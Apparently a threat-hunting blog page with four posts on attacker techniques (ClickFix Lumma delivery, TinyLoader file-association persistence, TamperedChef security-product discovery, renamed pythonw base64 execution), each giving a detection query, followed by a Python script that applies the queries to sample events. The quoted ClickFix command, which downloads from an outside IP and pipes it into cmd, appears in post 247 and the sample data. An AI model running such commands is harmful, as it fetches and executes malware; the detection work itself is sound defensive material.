Posts

Showing posts from September, 2025

247. Another Hunting Opportunity from ClickFix

Hello everyone! We have already looked at many ClickFix variations, but adversaries keep experimenting with this technique, so we keep getting new detection and hunting opportunities. This time we'll look at another example used by threat actors to deliver Lumma stealer. The victim is expected to run the following command:

cmd.exe /c start "" /min cmd /k "curl -s hXXp://85.209.129[.]105:2020/19 | cmd && exit; capcha code 74585

Here we can see that the adversary used start's command line arguments to run the download in a new window that opens minimized. You won't see this used legitimately very often, so we can use it to create a hunting query:

event_type: "processcreatewin" AND proc_file_path: "cmd.exe" AND cmdline: ("start" AND "min")

Keep in mind that "start" and "min" are bare terms, so the query will also pick up admin scripts that launch something with start /min; treat it as a hunting starting point rather than an alert on its own.

See you tomorrow!

246. That's How TinyLoader Maintains Persistence

Hello everyone! Recently I spotted another persistence technique that I don't see adversaries use often. I'm talking about the following technique: Change Default File Association (T1546.001). According to this report, TinyLoader modified the following registry key to hijack how Windows handles text files:

HKEY_CLASSES_ROOT\txtfile\shell\open\command

This allows the malware to be executed every time the victim opens a .txt file. So, we can hunt for registry modification events related to this key:

event_type: "registryvaluesetwin" AND reg_key_path: "txtfile\\shell\\open\\command"

Note that the query matches on the tail of the key path only: HKEY_CLASSES_ROOT is a merged view of HKLM\SOFTWARE\Classes and HKCU\SOFTWARE\Classes, so your telemetry may record the write under either of those hives rather than under HKCR.

See you tomorrow!

245. That's How TamperedChef Queries the System for Security Products

Hello everyone! It's very important for an adversary to collect information about the security software present on a compromised system. Let's look at another real-world example demonstrating how threat actors leverage Security Software Discovery (T1518.001) and Query Registry (T1012). According to this report, TamperedChef abused reg.exe (yes, again) to query the system registry in order to find out which security products are installed, for example:

reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\Bitdefender" /v "UninstallString"

We can use the security product names to build our detection:

event_type: "processcreatewin" AND proc_file_path: "reg.exe" AND cmdline: ("query" AND ("bitdefender" OR "g data antivirus" OR "checkpoint" OR "kasperskylabsetup" OR "fortinet" OR "zillya antivirus"))

The product list is a starting point: add the uninstall key names of the products actually deployed in your own environment.

See you tomorrow!

244. Adversaries Abuse Python to Deliver Commercial Malware

Hello everyone! We are all a bit tired of PowerShell. Even adversaries. So today we'll look at how they misuse another popular command and scripting interpreter: Python (T1059.006). According to this report, the adversary used AI-themed lures to trick the victim into installing ScreenConnect. Next, the threat actors ran a malicious BAT file which, among other things, executed a renamed pythonw.exe to run a base64-encoded command:

"pw.exe" -c "import base64;exec(base64.b64decode('aW1wb3J0IHl6aXJpcyY2F...'))"

In general, nothing new, right? Base64 again. But why not use it for hunting:

event_type: "processcreatewin" AND proc_file_originalfilename: "pythonw.exe" AND cmdline: "base64.b64decode"

Note that the query keys on the original file name from the PE version resource rather than on the image path, which is exactly what lets it catch the interpreter after it has been renamed to pw.exe.

See you tomorrow!
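The four hunting queries from posts 244 to 247, expressed as plain Python predicates and run over a handful of constructed process-creation and registry-set events. This is an added example, not code from the blog or from any of the reports it cites. The event field names follow the queries (event_type, proc_file_path, proc_file_originalfilename, cmdline, reg_key_path); the sample events, the loader path in the registry event and the base64 payload in the pythonw.exe event are made up for the example; and the whole-term matching in _term is an approximation of the query language's term matching, not a port of it. The decode helper goes one step past the query and shows what a hunter does with a hit: pull the base64 literal out of the command line and decode it for triage.

```python
import base64
import re

# Constructed sample telemetry (not real logs). Field names follow the
# hunting queries in posts 244-247; paths and payload are made up.
SAMPLE_EVENTS = [
    # Post 247: ClickFix one-liner, minimized window fetching a second stage.
    {"event_type": "processcreatewin",
     "proc_file_path": r"C:\Windows\System32\cmd.exe",
     "proc_file_originalfilename": "Cmd.Exe",
     "cmdline": 'cmd.exe /c start "" /min cmd /k "curl -s hXXp://85.209.129[.]105:2020/19 | cmd && exit"'},
    # Post 246: default file association hijack for .txt files (hypothetical loader path).
    {"event_type": "registryvaluesetwin",
     "proc_file_path": r"C:\Users\victim\AppData\Local\Temp\loader.exe",
     "reg_key_path": r"HKEY_CLASSES_ROOT\txtfile\shell\open\command",
     "reg_value_data": r"C:\Users\victim\AppData\Local\Temp\loader.exe %1"},
    # Post 245: reg.exe used to look for an installed security product.
    {"event_type": "processcreatewin",
     "proc_file_path": r"C:\Windows\System32\reg.exe",
     "proc_file_originalfilename": "reg.exe",
     "cmdline": r'reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\Bitdefender" /v "UninstallString"'},
    # Post 244: renamed pythonw.exe running a base64-encoded script.
    # The payload is constructed for this example (it decodes to a harmless print).
    {"event_type": "processcreatewin",
     "proc_file_path": r"C:\Users\victim\AppData\Roaming\pw.exe",
     "proc_file_originalfilename": "pythonw.exe",
     "cmdline": '"pw.exe" -c "import base64;exec(base64.b64decode(\'aW1wb3J0IG9zO3ByaW50KCJoZWxsbyIp\'))"'},
    # Benign noise that must not fire any rule.
    {"event_type": "processcreatewin",
     "proc_file_path": r"C:\Windows\System32\cmd.exe",
     "proc_file_originalfilename": "Cmd.Exe",
     "cmdline": r"cmd.exe /c dir C:\Users\victim\Documents"},
    {"event_type": "processcreatewin",
     "proc_file_path": r"C:\Windows\System32\reg.exe",
     "proc_file_originalfilename": "reg.exe",
     "cmdline": r'reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Run"'},
]

SECURITY_PRODUCTS = ("bitdefender", "g data antivirus", "checkpoint",
                     "kasperskylabsetup", "fortinet", "zillya antivirus")


def _term(text, word):
    """Whole-term, case-insensitive match; approximates the query language's term match."""
    return re.search(r"\b" + re.escape(word) + r"\b", text, re.IGNORECASE) is not None


def _image(ev, name):
    """Compare the image file name (last path component) case-insensitively."""
    return ev.get("proc_file_path", "").rsplit("\\", 1)[-1].lower() == name


# One predicate per hunting query, keyed by the post number it comes from.
RULES = {
    "247_clickfix_minimized_cmd": lambda ev: (
        ev["event_type"] == "processcreatewin" and _image(ev, "cmd.exe")
        and _term(ev.get("cmdline", ""), "start") and _term(ev.get("cmdline", ""), "min")),
    "246_txtfile_association_hijack": lambda ev: (
        ev["event_type"] == "registryvaluesetwin"
        and "txtfile\\shell\\open\\command" in ev.get("reg_key_path", "").lower()),
    "245_reg_query_security_software": lambda ev: (
        ev["event_type"] == "processcreatewin" and _image(ev, "reg.exe")
        and _term(ev.get("cmdline", ""), "query")
        and any(_term(ev.get("cmdline", ""), p) for p in SECURITY_PRODUCTS)),
    "244_pythonw_base64_exec": lambda ev: (
        ev["event_type"] == "processcreatewin"
        and ev.get("proc_file_originalfilename", "").lower() == "pythonw.exe"
        and _term(ev.get("cmdline", ""), "base64.b64decode")),
}


def hunt(events):
    """Return [(rule_name, event_index)] for every event a rule fires on."""
    hits = []
    for i, ev in enumerate(events):
        for name, pred in RULES.items():
            if pred(ev):
                hits.append((name, i))
    return hits


_B64_ARG = re.compile(r"b64decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")


def decode_python_payload(cmdline):
    """Pull the base64 literal out of a b64decode('...') call and decode it for triage.
    Returns None when there is no such literal or it is not valid base64."""
    m = _B64_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:
        return None


if __name__ == "__main__":
    for name, i in hunt(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[i]
        print(f"[{name}] event {i}: {ev.get('cmdline') or ev.get('reg_key_path')}")
        if name.startswith("244"):
            print("    decoded payload:", decode_python_payload(ev["cmdline"]))
```

Running the script fires exactly one rule per malicious event and none on the two benign ones; the base64 payload in the real case is truncated in the post, so the decode step is shown on a constructed payload only.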